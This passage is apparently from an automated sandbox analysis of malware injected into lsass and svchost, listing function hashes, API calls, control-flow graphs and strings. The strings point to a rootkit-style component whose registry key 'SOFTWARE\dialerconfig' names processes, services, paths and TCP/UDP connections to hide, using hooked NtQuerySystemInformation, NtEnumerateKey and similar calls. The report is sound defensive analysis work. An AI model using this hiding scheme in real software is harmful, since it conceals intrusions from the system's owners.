                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: ierarchy Descriptor'$riptor at (
                                                                    • API String ID: 592178966-758928094
                                                                    • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction ID: 42604dadee08075db72dd804d857af22540e6553bd8cf7546b60624dadb498d8
                                                                    • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                    • Instruction Fuzzy Hash: 2DE08661640F4594DF058F22F84829873A0DB99BA4F499123996D0B315FA3CD6F9C700
                                                                    Function 000002D6F14E73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: Locator'$riptor at (
                                                                    • API String ID: 592178966-4215709766
                                                                    • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction ID: d05b7e5c656130d9458ccdc22e0b75791a29142332b64578b38792f26bb6b93c
                                                                    • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                    • Instruction Fuzzy Hash: 41E08661640F4484DF058F21F8441987360E799B94B889123C96D0B355EA3CD5E5C700
                                                                    Function 000002D6F1511BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction ID: fd815924ccaf22e34c037317531bc049dc234f77afa6770aba1465aea0f85cca
                                                                    • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                    • Instruction Fuzzy Hash: F5118C66601F8489EE05DF66F84C22973A1FB89FC4F18406ADE4E57B66DE3CD842C300
                                                                    Function 000002D6F1511268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction ID: 5530d73242211928b6024003faf75465f242705db9492874eec173ea436ce9dc
                                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction Fuzzy Hash: 48E092B6601A848AEB048F62E80C34A36E1FB8DF86F14C024CD0E07751DF7D98D9CB50

                                                                    Execution Graph

                                                                    Execution Coverage:0.7%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:74
                                                                    Total number of Limit Nodes:2
                                                                    execution_graph 15131 14e41fd1abc 15136 14e41fd1628 GetProcessHeap 15131->15136 15133 14e41fd1acb 15134 14e41fd1ad2 Sleep SleepEx 15133->15134 15135 14e41fd1598 StrCmpIW StrCmpW 15133->15135 15134->15133 15135->15133 15137 14e41fd1648 _invalid_parameter_noinfo 15136->15137 15181 14e41fd1268 GetProcessHeap 15137->15181 15139 14e41fd1650 15140 14e41fd1268 2 API calls 15139->15140 15141 14e41fd1661 15140->15141 15142 14e41fd1268 2 API calls 15141->15142 15143 14e41fd166a 15142->15143 15144 14e41fd1268 2 API calls 15143->15144 15145 14e41fd1673 15144->15145 15146 14e41fd168e RegOpenKeyExW 15145->15146 15147 14e41fd18a6 15146->15147 15148 14e41fd16c0 RegOpenKeyExW 15146->15148 15147->15133 15149 14e41fd16e9 15148->15149 15150 14e41fd16ff RegOpenKeyExW 15148->15150 15185 14e41fd12bc RegQueryInfoKeyW 15149->15185 15152 14e41fd173a RegOpenKeyExW 15150->15152 15153 14e41fd1723 15150->15153 15155 14e41fd1775 RegOpenKeyExW 15152->15155 15156 14e41fd175e 15152->15156 15196 14e41fd104c RegQueryInfoKeyW 15153->15196 15160 14e41fd1799 15155->15160 15161 14e41fd17b0 RegOpenKeyExW 15155->15161 15159 14e41fd12bc 13 API calls 15156->15159 15162 14e41fd176b RegCloseKey 15159->15162 15163 14e41fd12bc 13 API calls 15160->15163 15164 14e41fd17eb RegOpenKeyExW 15161->15164 15165 14e41fd17d4 15161->15165 15162->15155 15166 14e41fd17a6 RegCloseKey 15163->15166 15168 14e41fd1826 RegOpenKeyExW 15164->15168 15169 14e41fd180f 15164->15169 15167 14e41fd12bc 13 API calls 15165->15167 15166->15161 15173 14e41fd17e1 RegCloseKey 15167->15173 15171 14e41fd184a 15168->15171 15172 14e41fd1861 RegOpenKeyExW 15168->15172 15170 14e41fd104c 5 API calls 15169->15170 15174 14e41fd181c RegCloseKey 15170->15174 15175 14e41fd104c 5 API calls 15171->15175 15176 14e41fd189c RegCloseKey 15172->15176 15177 14e41fd1885 15172->15177 15173->15164 15174->15168 15178 14e41fd1857 RegCloseKey 15175->15178 15176->15147 15179 14e41fd104c 5 API calls 15177->15179 15178->15172 15180 14e41fd1892 RegCloseKey 15179->15180 15180->15176 15202 14e41fe6168 15181->15202 15183 14e41fd1283 GetProcessHeap 15184 14e41fd12ae _invalid_parameter_noinfo 15183->15184 15184->15139 15186 14e41fd148a RegCloseKey 15185->15186 15187 14e41fd1327 GetProcessHeap 15185->15187 15186->15150 15193 14e41fd133e _invalid_parameter_noinfo 15187->15193 15188 14e41fd1476 GetProcessHeap HeapFree 15188->15186 15189 14e41fd1352 RegEnumValueW 15189->15193 15191 14e41fd13d3 GetProcessHeap 15191->15193 15192 14e41fd141e lstrlenW GetProcessHeap 15192->15193 15193->15188 15193->15189 15193->15191 15193->15192 15194 14e41fd13f3 GetProcessHeap HeapFree 15193->15194 15195 14e41fd1443 StrCpyW 15193->15195 15204 14e41fd152c 15193->15204 15194->15192 15195->15193 15197 14e41fd11b5 RegCloseKey 15196->15197 15200 14e41fd10bf _invalid_parameter_noinfo 15196->15200 15197->15152 15198 14e41fd10cf RegEnumValueW 15198->15200 15199 14e41fd114e GetProcessHeap 15199->15200 15200->15197 15200->15198 15200->15199 15201 14e41fd116e GetProcessHeap HeapFree 15200->15201 15201->15200 15203 14e41fe6177 15202->15203 15205 14e41fd157c 15204->15205 15206 14e41fd1546 15204->15206 15205->15193 15206->15205 15207 14e41fd155d StrCmpIW 15206->15207 15208 14e41fd1565 StrCmpW 15206->15208 15207->15206 15208->15206 15209 14e41fa273c 15210 14e41fa276a 15209->15210 15211 14e41fa2858 LoadLibraryA 15210->15211 15212 14e41fa28d4 15210->15212 15211->15210

                                                                    Executed Functions

                                                                    Function 0000014E41FD1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1617791916-0
                                                                    • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction ID: 58e4b1372e48106c13d9c210e95dfed249a6192135837390fc88e392b1da2cd8
                                                                    • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                    • Instruction Fuzzy Hash: 52E0393570170886EB058B62D80838AB7E1FB89F26F0A8028890947361DF7DC49AC760
                                                                    Function 0000014E41FD328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                    • String ID:
                                                                    • API String ID: 1683269324-0
                                                                    • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction ID: 701d4b212a0684b59ab9b099f346debbb554c1cfb4979cb8b986742d3a5a455b
                                                                    • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                    • Instruction Fuzzy Hash: CB1139B271864182FF60AB61BB1D3F9A3E4BF54344F5841259A0BC16B5EF7CC1468230
                                                                    Function 0000014E41FD1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 0000014E41FD1628: GetProcessHeap.KERNEL32 ref: 0000014E41FD1633
                                                                      • Part of subcall function 0000014E41FD1628: HeapAlloc.KERNEL32 ref: 0000014E41FD1642
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16B2
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD16DF
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD16F9
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1719
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1734
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1754
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD176F
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD178F
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17AA
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD17CA
                                                                    • Sleep.KERNEL32 ref: 0000014E41FD1AD7
                                                                    • SleepEx.KERNELBASE ref: 0000014E41FD1ADD
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD17E5
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1805
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1820
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD1840
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD185B
                                                                      • Part of subcall function 0000014E41FD1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E41FD187B
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD1896
                                                                      • Part of subcall function 0000014E41FD1628: RegCloseKey.ADVAPI32 ref: 0000014E41FD18A0
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                    • String ID:
                                                                    • API String ID: 1534210851-0
                                                                    • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction ID: 27739bd1d7c2b649979a3e3ac9a2f5b2f111066e3f9e7ba65cc6bd2b1fdd864d
                                                                    • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                    • Instruction Fuzzy Hash: 1231B771308A4182EF509B66DA593F9A3E4BF84BD0F0C55229E0BC76B6EF24C8538330
                                                                    Function 0000014E41FD3844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 62 14e41fd3844-14e41fd384f 63 14e41fd3869-14e41fd3870 62->63 64 14e41fd3851-14e41fd3864 StrCmpNIW 62->64 64->63 65 14e41fd3866 64->65 65->63
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dialer
                                                                    • API String ID: 0-3528709123
                                                                    • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                    • Instruction ID: edc9b53c890d6efa8cfb08019f2e5464623e49ddff2869f1cd1f5de1b6805b2a
                                                                    • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                    • Instruction Fuzzy Hash: 8BD05EB13117058AFF14DFAA88CD6B0A390BF04754F8C40208A0181660DB18C99E9620
                                                                    Function 0000014E41FA273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436459719.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fa0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction ID: 67325ab9c1bf59a10d455d8bffd91d13401eaaa9fb1b126a29269b2ed4ac34ab
                                                                    • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                    • Instruction Fuzzy Hash: CA61DD32B0169087DF54CF9590487ADB3E2FB58BE4F1C8121EE5A87B98DA38D853D720

                                                                    Non-executed Functions

                                                                    Function 0000014E41FD2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 372 14e41fd2b2c-14e41fd2ba5 call 14e41ff2ce0 375 14e41fd2bab-14e41fd2bb1 372->375 376 14e41fd2ee0-14e41fd2f03 372->376 375->376 377 14e41fd2bb7-14e41fd2bba 375->377 377->376 378 14e41fd2bc0-14e41fd2bc3 377->378 378->376 379 14e41fd2bc9-14e41fd2bd9 GetModuleHandleA 378->379 380 14e41fd2bdb-14e41fd2beb call 14e41fe6090 379->380 381 14e41fd2bed 379->381 383 14e41fd2bf0-14e41fd2c0e 380->383 381->383 383->376 386 14e41fd2c14-14e41fd2c33 StrCmpNIW 383->386 386->376 387 14e41fd2c39-14e41fd2c3d 386->387 387->376 388 14e41fd2c43-14e41fd2c4d 387->388 388->376 389 14e41fd2c53-14e41fd2c5a 388->389 389->376 390 14e41fd2c60-14e41fd2c73 389->390 391 14e41fd2c83 390->391 392 14e41fd2c75-14e41fd2c81 390->392 393 14e41fd2c86-14e41fd2c8a 391->393 392->393 394 14e41fd2c9a 393->394 395 14e41fd2c8c-14e41fd2c98 393->395 396 14e41fd2c9d-14e41fd2ca7 394->396 395->396 397 14e41fd2d9d-14e41fd2da1 396->397 398 14e41fd2cad-14e41fd2cb0 396->398 401 14e41fd2da7-14e41fd2daa 397->401 402 14e41fd2ed2-14e41fd2eda 397->402 399 14e41fd2cc2-14e41fd2ccc 398->399 400 14e41fd2cb2-14e41fd2cbf call 14e41fd199c 398->400 404 14e41fd2cce-14e41fd2cdb 399->404 405 14e41fd2d00-14e41fd2d0a 399->405 400->399 406 14e41fd2dbb-14e41fd2dc5 401->406 407 14e41fd2dac-14e41fd2db8 call 14e41fd199c 401->407 402->376 402->390 404->405 412 14e41fd2cdd-14e41fd2cea 404->412 413 14e41fd2d3a-14e41fd2d3d 405->413 414 14e41fd2d0c-14e41fd2d19 405->414 409 14e41fd2dc7-14e41fd2dd4 406->409 410 14e41fd2df5-14e41fd2df8 406->410 407->406 409->410 418 14e41fd2dd6-14e41fd2de3 409->418 419 14e41fd2dfa-14e41fd2e03 call 14e41fd1bbc 410->419 420 14e41fd2e05-14e41fd2e12 lstrlenW 410->420 421 14e41fd2ced-14e41fd2cf3 412->421 416 14e41fd2d4b-14e41fd2d58 lstrlenW 413->416 417 14e41fd2d3f-14e41fd2d49 call 14e41fd1bbc 413->417 414->413 422 14e41fd2d1b-14e41fd2d28 414->422 424 14e41fd2d7b-14e41fd2d8d call 14e41fd3844 416->424 425 14e41fd2d5a-14e41fd2d64 416->425 417->416 429 14e41fd2d93-14e41fd2d98 417->429 426 14e41fd2de6-14e41fd2dec 418->426 419->420 436 14e41fd2e4a-14e41fd2e55 419->436 430 14e41fd2e35-14e41fd2e3f call 14e41fd3844 420->430 431 14e41fd2e14-14e41fd2e1e 420->431 428 14e41fd2cf9-14e41fd2cfe 421->428 421->429 432 14e41fd2d2b-14e41fd2d31 422->432 424->429 440 14e41fd2e42-14e41fd2e44 424->440 425->424 435 14e41fd2d66-14e41fd2d79 call 14e41fd152c 425->435 426->436 437 14e41fd2dee-14e41fd2df3 426->437 428->405 428->421 429->440 430->440 431->430 441 14e41fd2e20-14e41fd2e33 call 14e41fd152c 431->441 432->429 442 14e41fd2d33-14e41fd2d38 432->442 435->424 435->429 444 14e41fd2ecc-14e41fd2ed0 436->444 445 14e41fd2e57-14e41fd2e5b 436->445 437->410 437->426 440->402 440->436 441->430 441->436 442->413 442->432 444->402 449 14e41fd2e5d-14e41fd2e61 445->449 450 14e41fd2e63-14e41fd2e7d call 14e41fd85c0 445->450 449->450 453 14e41fd2e80-14e41fd2e83 449->453 450->453 456 14e41fd2ea6-14e41fd2ea9 453->456 457 14e41fd2e85-14e41fd2ea3 call 14e41fd85c0 453->457 456->444 459 14e41fd2eab-14e41fd2ec9 call 14e41fd85c0 456->459 457->456 459->444
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                    • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                    • API String ID: 2119608203-3850299575
                                                                    • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction ID: effd1d481dd4490a16ad21cf9b2687bc37b8d46439eecc8b1afc957421dada5b
                                                                    • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                    • Instruction Fuzzy Hash: DBB16972310A9086FF649FA5D4587E9A3E5FF44B94F485016EE0A937A4DB35CC42C7A0
                                                                    Function 0000014E41FD7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3140674995-0
                                                                    • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction ID: 4a8a08b1cb576b9d78726fe8905b333cbd284622d38cdc1c56e494f92cae6b39
                                                                    • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                    • Instruction Fuzzy Hash: 4B316172305B8489EF609F60E8543EDB3A0FB84758F48412ADA4E87BA4EF38C549C720
                                                                    Function 0000014E41FDD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 1239891234-0
                                                                    • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction ID: 6ff2dff154542a0378403bbbd0c8e4de9d1707aa7ebe8d406dd5d67eefb56c20
                                                                    • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                    • Instruction Fuzzy Hash: 39313136314F8086DB60CF25E8443EEB3A4FB89764F580116EA9E87BA5DF38C556CB10
                                                                    Function 0000014E41FD1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                    • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                    • API String ID: 106492572-2879589442
                                                                    • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction ID: a2090c4e061c94f1704aee29069009e9ac06c7e615b494ced23eb7a84219142a
                                                                    • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                    • Instruction Fuzzy Hash: ED712836318B1486EF10AF61E8886E9A3F5FB84B98F091111DE4E87B39DF38C546C360
                                                                    Function 0000014E41FD12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                    • String ID: d
                                                                    • API String ID: 2005889112-2564639436
                                                                    • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction ID: 013e14f2c87ef41763d25eff144d490c8d2c3adaa6cff7853b3d531281aa9866
                                                                    • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                    • Instruction Fuzzy Hash: D5513036708B8886EB55CF62E5483AAB7E1FB89F95F494124DE4A47768DF3CC046C710
                                                                    Function 0000014E41FD1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003F.00000002.3436526303.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_63_2_14e41fd0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread$AddressHandleModuleProc
                                                                    • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                    • API String ID: 4175298099-1975688563
                                                                    • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction ID: d2164b162b6ae80d87fccfd4c10993e61a433f491f5e0695c4aef27492673104
                                                                    • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                    • Instruction Fuzzy Hash: 60318274704A4AA0FF04EFA9E8597E4E3A1BF54354F8D5013941A97676AF78C24BC3B0
                                                                    Function 0000014E41FA6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 214 14e41fa6910-14e41fa6916 215 14e41fa6918-14e41fa691b 214->215 216 14e41fa6951-14e41fa695b 214->216 217 14e41fa691d-14e41fa6920 215->217 218 14e41fa6945-14e41fa6984 call 14e41fa6fc0 215->218 219 14e41fa6a78-14e41fa6a8d 216->219 220 14e41fa6938 __scrt_dllmain_crt_thread_attach 217->220 221 14e41fa6922-14e41fa6925 217->221 237 14e41fa698a-14e41fa699f call 14e41fa6e54 218->237 238 14e41fa6a52 218->238 222 14e41fa6a9c-14e41fa6ab6 call 14e41fa6e54 219->222 223 14e41fa6a8f 219->223 229 14e41fa693d-14e41fa6944 220->229 225 14e41fa6927-14e41fa6930 221->225 226 14e41fa6931-14e41fa6936 call 14e41fa6f04 221->226 235 14e41fa6ab8-14e41fa6aed call 14e41fa6f7c call 14e41fa6e1c call 14e41fa7318 call 14e41fa7130 call 14e41fa7154 call 14e41fa6fac 222->235 236 14e41fa6aef-14e41fa6b20 call 14e41fa7190 222->236 227 14e41fa6a91-14e41fa6a9b 223->227 226->229 235->227 248 14e41fa6b31-14e41fa6b37 236->248 249 14e41fa6b22-14e41fa6b28 236->249 246 14e41fa6a6a-14e41fa6a77 call 14e41fa7190 237->246 247 14e41fa69a5-14e41fa69b6 call 14e41fa6ec4 237->247 242 14e41fa6a54-14e41fa6a69 238->242 246->219 264 14e41fa69b8-14e41fa69dc call 14e41fa72dc call 14e41fa6e0c call 14e41fa6e38 call 14e41faac0c 247->264 265 14e41fa6a07-14e41fa6a11 call 14e41fa7130 247->265 254 14e41fa6b39-14e41fa6b43 248->254 255 14e41fa6b7e-14e41fa6b94 call 14e41fa268c 248->255 249->248 253 14e41fa6b2a-14e41fa6b2c 249->253 260 14e41fa6c1f-14e41fa6c2c 253->260 261 14e41fa6b4f-14e41fa6b5d call 14e41fb5780 254->261 262 14e41fa6b45-14e41fa6b4d 254->262 275 14e41fa6b96-14e41fa6b98 255->275 276 14e41fa6bcc-14e41fa6bce 255->276 267 14e41fa6b63-14e41fa6b78 call 14e41fa6910 261->267 279 14e41fa6c15-14e41fa6c1d 261->279 262->267 264->265 317 14e41fa69de-14e41fa69e5 __scrt_dllmain_after_initialize_c 264->317 265->238 287 14e41fa6a13-14e41fa6a1f call 